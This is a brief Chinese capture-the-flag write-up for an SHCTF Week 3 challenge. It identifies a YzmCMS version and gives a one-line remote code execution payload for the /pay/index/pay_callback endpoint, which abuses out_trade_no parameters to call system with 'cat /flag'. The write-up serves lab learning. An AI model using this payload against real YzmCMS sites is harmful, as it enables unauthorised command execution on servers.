shctf[Week3] 小小cms
看到首页面
了解到YzmCMS的版本,上网搜搜这个版本存在的漏洞
发现存在任意函数调用RCE的漏洞
https://blog.csdn.net/shelter1234567/article/details/138524342
根据文章直接抄payload,进入/pay/index/pay_callback目录下
下面cat /flag即可,最终的payload为
out_trade_no[0]=eq&out_trade_no[1]=cat /flag&out_trade_no[2]=system
浙公网安备 33010602011771号